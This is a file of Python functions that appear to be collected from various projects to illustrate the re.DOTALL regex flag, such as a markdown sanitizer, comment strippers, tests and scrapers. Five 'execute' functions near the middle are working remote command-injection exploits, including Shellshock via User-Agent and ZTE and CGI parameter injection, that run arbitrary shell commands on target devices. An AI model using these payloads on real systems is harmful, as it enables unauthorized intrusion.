def get_action(driver, keyword):
    """Get the action class that defines *keyword* for the given driver.

    Imports ``ProductDrivers.<driver>``, reads the source of its ``main``
    function to locate the ``package_list = [...]`` assignment, then scans
    every module in each listed package for a class exposing a routine
    named *keyword*.

    Arguments:
    driver  -- module name under the ProductDrivers package
    keyword -- name of the action routine to look up

    Returns the matching class object, or None when the driver has no
    ``main``, no package_list, or nothing defines *keyword*.
    """
    drvmod = 'ProductDrivers.' + driver
    drvmodobj = importlib.import_module(drvmod)
    drvfile_methods = inspect.getmembers(drvmodobj, inspect.isroutine)
    # next(...) with a default avoids an IndexError when the driver has no main()
    main_method = next((item[1] for item in drvfile_methods if item[0] == 'main'), None)
    if main_method is None:
        return None
    main_src = inspect.getsource(main_method)
    pkglstmatch = re.search(r'package_list.*=.*\[(.*)\]', main_src, re.MULTILINE | re.DOTALL)
    if pkglstmatch is None:
        # main() does not declare a package_list; nothing to search.
        return None
    # The captured text is raw Python source, so each entry still carries
    # quote characters and whitespace; strip them before importing.
    pkglst = [pkg.strip().strip("'\"") for pkg in pkglstmatch.group(1).split(',') if pkg.strip()]
    for pkg in pkglst:
        pkgobj = importlib.import_module(pkg)
        pkgdir = os.path.dirname(pkgobj.__file__)
        action_modules = [pkg + '.' + name for _, name, _ in pkgutil.iter_modules([pkgdir])]
        action_module_objs = [importlib.import_module(action_module) for action_module in action_modules]
        for action_module_obj in action_module_objs:
            for action_class in inspect.getmembers(action_module_obj, inspect.isclass):
                # First class with a routine named *keyword* wins.
                for func_name in inspect.getmembers(action_class[1], inspect.isroutine):
                    if keyword == func_name[0]:
                        return action_class[1]
    return None
# Example snippets demonstrating Python's re.DOTALL flag (collected sources)
def safe_text_for_markdown(text):
    """Clean *text* with bleach while preserving certain Markdown sections.

    Code sections (` or ``` combos) are protected via the code-block marker
    helpers.  Quote prefixes ("> "), which bleach would otherwise escape,
    are swapped for placeholder tokens before cleaning and restored after.
    """
    code_blocks, text = code_blocks_add_markers(text)
    # Hide quote markers behind placeholders that bleach will leave alone.
    text = re.sub(r"(^> )", "%%safe_quote_in_start%%", text)
    text = re.sub(r"(\n> )", "%%safe_quote_in_new_line%%", text, flags=re.DOTALL)
    # Strip all html, scripts, etc.
    cleaned = bleach.clean(text or "")
    # Bring the quote markers back.
    cleaned = cleaned.replace("%%safe_quote_in_start%%", "> ")
    cleaned = cleaned.replace("%%safe_quote_in_new_line%%", "\n> ")
    return code_blocks_restore(code_blocks, cleaned)
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
    """Resolve the URL of a specific episode from a show page.

    Scrapes the show page at *url* for its "episodios" lists and returns the
    href of the link whose "SxE" marker matches (season, episode).  Returns
    None implicitly on any failure (bare except is deliberate best-effort,
    common in this scraper framework).  imdb/tvdb/title/premiered are unused
    here but kept for the shared scraper interface.
    """
    try:
        if url == None: return
        result = client.request(url)
        # can't use the DOM parser here because the HTML is bugged: the div is not closed
        result = re.findall ('<ul class="episodios">(.*?)</ul>', result, re.MULTILINE | re.DOTALL)
        for item in result:
            season_episodes = re.findall ('<li>(.*?)</li>', item, re.MULTILINE | re.DOTALL)
            for row in season_episodes:
                # The "numerando" cell holds "season x episode", e.g. "2x05".
                s = client.parseDOM(row, 'div', attrs={'class': 'numerando'})[0].split('x')
                season_found = s[0].strip()
                episode_found = s[1].strip()
                # Wrong season: this whole <ul> is for another season, skip it.
                if(season_found != season):
                    break
                if episode_found == episode :
                    return client.parseDOM(row, 'a', ret='href')[0]
    except:
        return
def __search(self, titles, year):
    # Search the site's JSON endpoint for *titles* near *year* and return
    # the stripped domain path of the best match, or None on any failure.
    # (Python 2 code: urllib.urlencode / urlparse.)
    try:
        r = urllib.urlencode({'keyword': titles[0]})
        r = client.request(urlparse.urljoin(self.base_link, self.search_link), XHR=True, post=r)
        # Acceptable cleaned titles and years ('0' means year unknown).
        t = [cleantitle.get(i) for i in set(titles) if i]
        y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
        r = json.loads(r)
        # (link, title) pairs with html tags stripped from the title.
        r = [(i['link'], re.sub('<.+?>|</.+?>', '', i['title'])) for i in r if 'title' in i and 'link' in i]
        # Drop any trailing "Movie N: ..." suffix from the title.
        r = [(i[0], i[1], re.findall('(.+?)\s*Movie \d+:.+?$', i[1], re.DOTALL)) for i in r]
        r = [(i[0], i[2][0] if len(i[2]) > 0 else i[1]) for i in r]
        # Split "<title> (<year>)" into separate title and year when present.
        r = [(i[0], i[1], re.findall('(.+?) \((\d{4})\)?', i[1])) for i in r]
        r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
        r = sorted(r, key=lambda i: int(i[2]), reverse=True) # with year > no year
        # First candidate whose cleaned title and year both match.
        r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y][0]
        return source_utils.strip_domain(r)
    except:
        return
def remove_cpp_comment(code):
    """Strip C/C++ comments from *code* while preserving line numbering.

    Both ``//`` line comments and ``/* */`` block comments are replaced by
    the newlines they contained (so later line numbers stay valid), while
    string and character literals are left untouched even if they look like
    comments.
    """
    comment_or_literal = re.compile(
        r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
        re.DOTALL | re.MULTILINE,
    )

    def _substitute(match):
        token = match.group(0)
        if not token.startswith('/'):
            # A string or char literal: keep it verbatim.
            return token
        # A comment: keep only its newline characters.
        return "\n" * token.count('\n')

    return comment_or_literal.sub(_substitute, code)
# remove non-ASCII chars
def str_flags_to_int(str_flags):
    """Translate a string of regex flag letters (e.g. "im") into the
    corresponding ``re`` module flag bits."""
    letter_to_flag = (
        ("i", re.IGNORECASE),
        ("l", re.LOCALE),
        ("m", re.MULTILINE),
        ("s", re.DOTALL),
        ("u", re.UNICODE),
        ("x", re.VERBOSE),
    )
    flags = 0
    for letter, flag in letter_to_flag:
        if letter in str_flags:
            flags |= flag
    return flags
def _encode_regex(name, value, dummy0, dummy1):
    """Encode a python regex or bson.regex.Regex as a BSON regex element.

    *name* is the already-encoded element name (bytes); *value* supplies
    ``.pattern`` and ``.flags``.  The flag string uses BSON's letter codes
    in the fixed order i, l, m, s, u, x.
    """
    flags = value.flags
    if flags == 0:
        # Python 2 common case: no flags at all.
        return b"\x0B" + name + _make_c_string_check(value.pattern) + b"\x00"
    if flags == re.UNICODE:
        # Python 3 common case: only the implicit UNICODE flag.
        return b"\x0B" + name + _make_c_string_check(value.pattern) + b"u\x00"
    flag_chars = b""
    for flag, char in ((re.IGNORECASE, b"i"), (re.LOCALE, b"l"),
                       (re.MULTILINE, b"m"), (re.DOTALL, b"s"),
                       (re.UNICODE, b"u"), (re.VERBOSE, b"x")):
        if flags & flag:
            flag_chars += char
    return b"\x0B" + name + _make_c_string_check(value.pattern) + flag_chars + b"\x00"
def run(cls):
    """Check variables.

    Validates project metadata against the setup-time constants: dunder
    attributes on the imported package, the changelog entry for the current
    version, and the pinned dependency list mirrored in tox.ini.  Raises
    SystemExit with a message on the first mismatch.
    """
    project = __import__(IMPORT, fromlist=[''])
    # Verify __author__/__license__/__version__ on the imported package.
    for expected, var in [('@Robpol86', '__author__'), (LICENSE, '__license__'), (VERSION, '__version__')]:
        if getattr(project, var) != expected:
            raise SystemExit('Mismatch: {0}'.format(var))
    # Check changelog: expect a "<version> - YYYY-MM-DD" heading line.
    if not re.compile(r'^%s - \d{4}-\d{2}-\d{2}[\r\n]' % VERSION, re.MULTILINE).search(readme()):
        raise SystemExit('Version not found in readme/changelog file.')
    # Check tox.
    if INSTALL_REQUIRES:
        contents = readme('tox.ini')
        # Grab the indented body of the "install_requires =" ini setting.
        section = re.compile(r'[\r\n]+install_requires =[\r\n]+(.+?)[\r\n]+\w', re.DOTALL).findall(contents)
        if not section:
            raise SystemExit('Missing install_requires section in tox.ini.')
        in_tox = re.findall(r' ([^=]+)==[\w\d.-]+', section[0])
        # Order matters: the tox pins must list the same names in the same order.
        if INSTALL_REQUIRES != in_tox:
            raise SystemExit('Missing/unordered pinned dependencies in tox.ini.')
def strip_powershell_comments(data):
    """
    Strip block comments, line comments and empty lines from a PowerShell source file.
    """
    # Remove <# ... #> block comments first (they may span multiple lines).
    block_comment = re.compile('<#.*?#>', re.DOTALL)
    stripped = block_comment.sub('', data)
    # Drop blank lines and lines that are entirely a # comment.
    kept_lines = []
    for line in stripped.split('\n'):
        bare = line.strip()
        if bare and not bare.startswith("#"):
            kept_lines.append(line)
    # TODO: strip comments at the end of lines
    return "\n".join(kept_lines)
def helper(self, term_instance):
    """
    Called at the start of a WAV file capture. Calculates the length of the
    file and modifies `self.re_capture` with laser precision.
    """
    data = term_instance.capture
    # Unpack the standard 44-byte RIFF/WAVE header: ChunkID, ChunkSize,
    # Format, Subchunk1ID, Subchunk1Size, AudioFormat, NumChannels,
    # SampleRate, ByteRate, BlockAlign, BitsPerSample, Subchunk2ID,
    # Subchunk2Size.
    self.wav_header = struct.unpack(
        '4si4s4sihhiihh4si', self.re_wav_header.match(data).group())
    # Total file size = RIFF ChunkSize + 8 bytes (ChunkID + ChunkSize pair).
    self.wav_length = self.wav_header[1] + 8
    if not self.sent_message:
        channels = "mono"
        if self.wav_header[6] == 2:  # NumChannels field
            channels = "stereo"
        # Header consistency check: data chunk size + 44-byte header must
        # equal the declared total length.
        if self.wav_length != self.wav_header[12] + 44:
            # Corrupt WAV file
            message = _("WAV File is corrupted: Header data mismatch.")
            term_instance.send_message(message)
            term_instance.cancel_capture = True
        # NOTE(review): wav_header[7] is the sample rate in Hz, but the label
        # below says kHz — confirm whether the display is intentional.
        message = _("WAV File: %skHz (%s)" % (self.wav_header[7], channels))
        term_instance.send_message(message)
        self.sent_message = True
    # Update the capture regex with laser precision:
    self.re_capture = re.compile(
        b'(RIFF....WAVE.{%s})' % (self.wav_length-12), re.DOTALL)
def str_flags_to_int(str_flags):
    """Map regex flag letters ("i", "l", "m", "s", "u", "x") to the combined
    ``re`` flag integer."""
    flag_map = {
        "i": re.IGNORECASE,
        "l": re.LOCALE,
        "m": re.MULTILINE,
        "s": re.DOTALL,
        "u": re.UNICODE,
        "x": re.VERBOSE,
    }
    result = 0
    # Unknown letters simply contribute nothing, matching the original
    # letter-by-letter membership checks.
    for letter in str_flags:
        result |= flag_map.get(letter, 0)
    return result
def str_flags_to_int(str_flags):
    """Build an ``re`` flag bitmask from its single-letter string form."""
    combined = 0
    # Pair each letter with its flag; zip keeps the canonical i/l/m/s/u/x order.
    for letter, flag in zip("ilmsux",
                            (re.IGNORECASE, re.LOCALE, re.MULTILINE,
                             re.DOTALL, re.UNICODE, re.VERBOSE)):
        combined |= flag if letter in str_flags else 0
    return combined
def str_flags_to_int(str_flags):
    """Convert a string of regex flag letters into the equivalent ``re``
    module flag bits (OR is commutative, so check order is irrelevant)."""
    total = 0
    if "x" in str_flags:
        total |= re.VERBOSE
    if "u" in str_flags:
        total |= re.UNICODE
    if "s" in str_flags:
        total |= re.DOTALL
    if "m" in str_flags:
        total |= re.MULTILINE
    if "l" in str_flags:
        total |= re.LOCALE
    if "i" in str_flags:
        total |= re.IGNORECASE
    return total
def str_flags_to_int(str_flags):
    """Return the ``re`` flag bitmask encoded by the letters in *str_flags*."""
    pairs = (("i", re.IGNORECASE), ("l", re.LOCALE), ("m", re.MULTILINE),
             ("s", re.DOTALL), ("u", re.UNICODE), ("x", re.VERBOSE))
    acc = 0
    for ch, bit in pairs:
        # Each recognized letter contributes its flag bit exactly once.
        acc |= bit if ch in str_flags else 0
    return acc
def ParseWhois_INT(self):
    # Extract registrant / administrative / technical contact blocks from a
    # .INT whois page held in self.page.  (Python 2 code: print statements,
    # string module.)  NOTE(review): the matches are searched but never
    # stored — the rec_field values are unused and only a separator is
    # printed; this looks like work-in-progress/debug code.
    int_contacts = (
        {"page_field": "Registrant", "rec_field": "registrant"},
        {"page_field": "Administrative Contact", "rec_field": "administrative"},
        {"page_field": "Technical Contact", "rec_field": "technical"})
    # Normalize CRLF line endings before matching.
    page = string.replace(self.page, "\r\n", "\n")
    for contact in int_contacts:
        page_field = contact['page_field']
        # Everything after "<field>:" up to a line starting with a non-word char.
        s = "%s:(.*)\n\W" % page_field
        m = re.search(s, page, re.DOTALL)
        #if m: print m.group(1)
        print "-------------------"
##
## ----------------------------------------------------------------------
##
##
## ----------------------------------------------------------------------
##
def __init__(self, pattern, markdown_instance=None):
    """
    Create an instance of an inline pattern.

    Keyword arguments:

    * pattern: A regular expression that matches a pattern

    """
    # Wrap the pattern so group(1) captures everything before the match and
    # the final group captures everything after it.
    wrapped = "^(.*?)%s(.*)$" % pattern
    # Api for Markdown to pass safe_mode into instance
    self.safe_mode = False
    self.pattern = pattern
    self.compiled_re = re.compile(wrapped, re.DOTALL | re.UNICODE)
    if markdown_instance:
        self.markdown = markdown_instance
def chainReplace(toRegex, toValue, toArray):
    """Replace the first capture group of *toRegex* with *toValue* inside the
    CRLF-joined *toArray* (headers, or a single-element body).

    Returns the updated array on success, or *toArray* unchanged when the
    regex is empty, has no groups, or does not match.
    """
    # TODO clean up so that the input is headers+body and its called only once
    # TODO support encoding, including URL encode
    is_body = len(toArray) == 1
    if not toRegex:
        return toArray
    # BUG FIX (Geoff): a regex anchored at the newline of the last header
    # fails without trailing newlines; append them here and strip after.
    joined = "\r\n".join(toArray) + "\r\n\r\n"
    found = re.search(toRegex, joined, re.DOTALL)
    if found and len(found.groups()):
        replaced = joined[:found.start(1)] + toValue + joined[found.end(1):]
        if replaced.endswith("\r\n\r\n"):
            replaced = replaced[:-4]
        return [replaced] if is_body else replaced.split("\r\n")
    return toArray
## Method to replace custom special types in messages
def test_image_required(self, capfd):
    """
    When the main function is given no image argument, it should exit with
    a return code of 2 and inform the user of the missing argument.
    """
    # argparse exits with status 2 when a required argument is missing.
    with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
        main(['--tag', 'abc'])
    out, err = capfd.readouterr()
    # Nothing should be written to stdout; the error goes to stderr.
    assert_that(out, Equals(''))
    # More useful error message added to argparse in Python 3
    if sys.version_info >= (3,):
        # Use re.DOTALL so that '.*' also matches newlines
        assert_that(err, MatchesRegex(
            r'.*error: the following arguments are required: image$',
            re.DOTALL
        ))
    else:
        assert_that(
            err, MatchesRegex(r'.*error: too few arguments$', re.DOTALL))
def test_version_semver_requires_argument(self, capfd):
    """
    When the main function is given the `--version-semver` option without
    an argument, an error should be raised.
    """
    # '--semver-precision' is followed directly by '--', so argparse sees no
    # value for it and must exit with status 2.
    with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
        main([
            '--version', '1.2.3',
            '--version-semver',
            '--semver-precision',
            '--', 'test-image',
        ])
    out, err = capfd.readouterr()
    assert_that(out, Equals(''))
    # re.DOTALL lets '.*' span the usage lines preceding the error message.
    assert_that(err, MatchesRegex(
        r'.*error: argument -P/--semver-precision: expected one argument$',
        re.DOTALL
    ))
def execute(self, cmd):
    """Run *cmd* on the target via the login_handler.php command injection
    and return its output, or "" on failure.

    A random marker is echoed after the command so the output boundary can
    be located in the response body.
    """
    marker = random_text(32)
    url = "{}:{}/login_handler.php".format(self.target, self.port)
    headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
    data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, marker)
    response = http_request(method="POST", url=url, headers=headers, data=data)
    if response is None:
        return ""
    if marker not in response.text:
        return ""
    # NOTE(review): the empty first alternative means this captures the text
    # preceding the marker — confirm that is the intended output slice.
    matches = re.findall("(|.+?){}".format(marker), response.text, re.DOTALL)
    return matches[0] if matches else ""
def execute(self, cmd):
    """Run *cmd* on the target via Shellshock in the UCS Manager CGI.

    Injects a function-definition payload through the User-Agent header of
    /ucsm/isSamInstalled.cgi; the command output is echoed between two
    copies of a random marker string.  Returns "" on any failure.
    """
    mark = random_text(32)
    url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
    headers = {
        # Shellshock trigger "() { test;};" followed by the echoed payload.
        "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
    }
    response = http_request(method="GET", url=url, headers=headers)
    if response is None:
        return ""
    if mark in response.text:
        # Output is whatever sits between the two marker occurrences.
        regexp = "%s(|.+?)%s" % (mark, mark)
        res = re.findall(regexp, response.text, re.DOTALL)
        if len(res):
            return res[0]
    return ""
def execute(self, cmd):
    """Inject *cmd* through the configured HTTP header and return its output.

    self.valid is an injection template with {{marker}} and {{cmd}}
    placeholders; the command output appears between the two marker copies
    in the response.  Returns None when the request fails, "" when no
    output was found.
    """
    marker = random_text(32)
    url = "{}:{}{}".format(self.target, self.port, self.path)
    # Fill the template with the concrete marker and command.
    injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
    headers = {
        self.header: injection,
    }
    response = http_request(method=self.method, url=url, headers=headers)
    if response is None:
        return
    # Command output is sandwiched between the two marker occurrences.
    regexp = "{}(.+?){}".format(marker, marker)
    res = re.findall(regexp, response.text, re.DOTALL)
    if len(res):
        return res[0]
    else:
        return ""
def execute(self, cmd):
    """Send *cmd* through the ZTE web_shell_cmd.gch form and return the
    command output parsed out of the Frm_CmdAck textarea, or "" on failure."""
    url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
    headers = {u'Content-Type': u'multipart/form-data'}
    payload = {
        'IF_ACTION': 'apply',
        'IF_ERRORSTR': 'SUCC',
        'IF_ERRORPARAM': 'SUCC',
        'IF_ERRORTYPE': '-1',
        'Cmd': cmd,
        'CmdAck': '',
    }
    response = http_request(method="POST", url=url, headers=headers, data=payload)
    if response is None or response.status_code != 200:
        return ""
    # The device echoes command output inside the Frm_CmdAck textarea.
    ack = re.findall('<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>',
                     response.text, re.DOTALL)
    return ack[0] if ack else ""
def execute(self, cmd):
    """Run *cmd* via command injection in the gdrive.cgi f_gaccount parameter.

    Appends ";<cmd>;echo <marker>;" to the CGI query string and returns the
    response text preceding the echoed marker, or "" on any failure.
    """
    mark = random_text(32)
    url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
    response = http_request(method="GET", url=url)
    if response is None:
        return ""
    if mark in response.text:
        # NOTE(review): the empty first alternative makes this capture the
        # whole response up to the marker — confirm that is intended.
        regexp = "(|.+?){}".format(mark)
        res = re.findall(regexp, response.text, re.DOTALL)
        if len(res):
            return res[0]
    return ""
def remove_stack_traces(out):
    """Collapse Python tracebacks in *out* down to header + '...' + exception.

    Each blank-line-separated block is rewritten so that the traceback body
    is replaced by an ellipsis, leaving only the "Traceback ..." header and
    the final "ExceptionName: message" line — useful for stable doctest-like
    output comparison.
    """
    # this regexp taken from Python 2.5's doctest
    traceback_re = re.compile(r"""
        # Grab the traceback header. Different versions of Python have
        # said different things on the first traceback line.
        ^(?P<hdr> Traceback\ \(
        (?: most\ recent\ call\ last
        | innermost\ last
        ) \) :
        )
        \s* $ # toss trailing whitespace on the header.
        (?P<stack> .*?) # don't blink: absorb stuff until...
        ^(?=\w) # a line *starts* with alphanum.
        .*?(?P<exception> \w+ ) # exception name
        (?P<msg> [:\n] .*) # the rest
        """, re.VERBOSE | re.MULTILINE | re.DOTALL)
    blocks = []
    for block in blankline_separated_blocks(out):
        blocks.append(traceback_re.sub(r"\g<hdr>\n...\n\g<exception>\g<msg>", block))
    return "".join(blocks)
def _parse_book_info(html):
    """Parse author/press/publish_date/price fields from a book-info HTML snippet.

    :param html: HTML fragment containing the book description (string)

    NOTE(review): the original docstring and the field labels were Chinese
    but have been mangled to '?' characters by an encoding error.  The '??'
    strings below are runtime match labels and are left untouched, but they
    likely no longer match real page text — needs restoring from the
    upstream source.
    """
    # <br> tags separate the fields; replace them with an explicit sentinel
    # so each value can be captured up to the next boundary.
    end_flag = 'END_FLAG'
    html = html.replace('<br>', end_flag)
    html = html.replace('<br/>', end_flag)
    doc = lxml.html.fromstring(html)
    text = doc.text_content()
    # "<label>[:?]<value>END_FLAG" — the separator class was presumably a
    # full-width colon before the encoding damage.
    pattern = r'{}[:?](.*?){}'
    result = dict()
    for key, column in [
            ('author', '??'),
            ('press', '???'),
            ('publish_date', '???'),
            ('price', '??')]:
        result[key] = re.search(pattern.format(column, end_flag),
                                text,
                                re.I | re.DOTALL).group(1).strip()
    return result
def fprocess(infilep, outfilep):
    """
    Scans an input file for LA equations between double square brackets,
    e.g. [[ M3_mymatrix = M3_anothermatrix^-1 ]], and replaces the expression
    with a comment containing the equation followed by nested function calls
    that implement the equation as C code. A trailing semi-colon is appended.
    The equation within [[ ]] should NOT end with a semicolon as that will raise
    a ParseException. However, it is ok to have a semicolon after the right brackets.
    Other text in the file is unaltered.
    The arguments are file objects (NOT file names) opened for reading and
    writing, respectively.
    """
    # [[ ... ]] with surrounding whitespace trimmed from the captured equation.
    bracket_eqn = re.compile(r'\[\[\s*(.*?)\s*\]\]', re.DOTALL)
    source = infilep.read()

    def _to_c(match):
        equation = match.group(1)
        ccode = parse(equation)
        return "/* %s */\n%s;\nLAParserBufferReset();\n" % (equation, ccode)

    outfilep.write(bracket_eqn.sub(_to_c, source))
##-----------------------------------------------------------------------------------
def DownloadSetting(url):
    # Scrape a directory-listing style page at *url* for downloadable files.
    # Returns a list of (date, name, absolute_link) tuples; empty on error.
    # (Python 2 code: urllib2, print statements.)
    list = []
    try:
        req = urllib2.Request(url)
        req.add_header('User-Agent', 'VAS')
        response = urllib2.urlopen(req)
        link = response.read()
        response.close()
        # Each row looks like: <td><a href="LINK">NAME</a></td> ... <td>DATE</td>
        xx = re.compile('<td><a href="(.+?)">(.+?)</a></td>.*?<td>(.+?)</td>', re.DOTALL).findall(link)
        for link, name, date in xx:
            print link, name, date
            prelink = ''
            # Relative links are resolved against the listing URL minus asd.php.
            if not link.startswith("http://"):
                prelink = url.replace('asd.php','')
            list.append((date, name, prelink + link))
    except:
        print"ERROR DownloadSetting %s" %(url)
    return list
def suffix_map(par, job_suffix_dict, last_suffix_dict):
    """Expand {Suffix:...} placeholders in the parameter string *par*.

    Three token forms are supported:
      {Suffix:KEY}        -> all files for KEY in *last_suffix_dict*, space-joined
      {Suffix:STEP-KEY}   -> all files for KEY from job step STEP, space-joined
      {Suffix:STEP-KEY-N} -> the N-th (1-based) file for KEY from step STEP
    Unknown steps/keys or out-of-range indices leave the token untouched.
    """
    # {Suffix:KEY}: files from the most recent step.
    for suffix_key in last_suffix_dict.keys():
        par = par.replace('{Suffix:' + suffix_key + '}', ' '.join(last_suffix_dict[suffix_key]))
    # {Suffix:STEP-KEY}: all files of a key from a specific job step.
    step_token = re.compile("\\{Suffix:(\\d+)-(.*?)\\}", re.IGNORECASE | re.DOTALL)
    for token in step_token.findall(par):
        step = int(token[0])
        if step in job_suffix_dict and token[1] in job_suffix_dict[step]:
            par = par.replace('{Suffix:' + token[0] + '-' + token[1] + '}',
                              ' '.join(job_suffix_dict[step][token[1]]))
    # {Suffix:STEP-KEY-N}: a single file selected by 1-based index.
    indexed_token = re.compile("\\{Suffix:(\\d+)-(.*?)-(\\d+)\\}", re.IGNORECASE | re.DOTALL)
    for token in indexed_token.findall(par):
        step = int(token[0])
        index = int(token[2]) - 1
        if step in job_suffix_dict and token[1] in job_suffix_dict[step] \
                and index < len(job_suffix_dict[step][token[1]]):
            par = par.replace('{Suffix:' + token[0] + '-' + token[1] + '-' + token[2] + '}',
                              job_suffix_dict[step][token[1]][index])
    return par
def checked_call(fn, ctx, *args):
    """Call the cffi-wrapped function *fn* and raise a Python exception if
    *ctx* reports an error afterwards.

    On success returns fn's result.  On error, decodes ctx.error_type /
    ctx.error_display / ctx.error_description and maps them through
    EXCEPTION_MAP; FstError gets a second, more specific lookup keyed on
    "Type::EnumVariant" parsed from the description.  Falls back to
    FstError when no mapping exists.
    """
    res = fn(ctx, *args)
    if not ctx.has_error:
        return res
    type_str = ffi.string(ctx.error_type).decode('utf8')
    # Human-readable message, flattened to a single line.
    if ctx.error_display != ffi.NULL:
        msg = ffi.string(ctx.error_display).decode('utf8').replace('\n', ' ')
    else:
        msg = None
    err_type = EXCEPTION_MAP.get(type_str)
    if err_type is FstError:
        if ctx.error_description != ffi.NULL:
            desc_str = ffi.string(ctx.error_description).decode('utf8')
        else:
            desc_str = None
        # Description looks like "EnumVariant(...)"; extract the variant name
        # for the more specific "Type::Variant" mapping.
        enum_val = re.match(r'(\w+)\(.*?\)', desc_str, re.DOTALL).group(1)
        err_type = EXCEPTION_MAP.get("{}::{}".format(type_str, enum_val))
        if err_type is None:
            # No specific mapping: keep the variant name in the message.
            msg = "{}: {}".format(enum_val, msg)
    if err_type is None:
        err_type = FstError
    raise err_type(msg)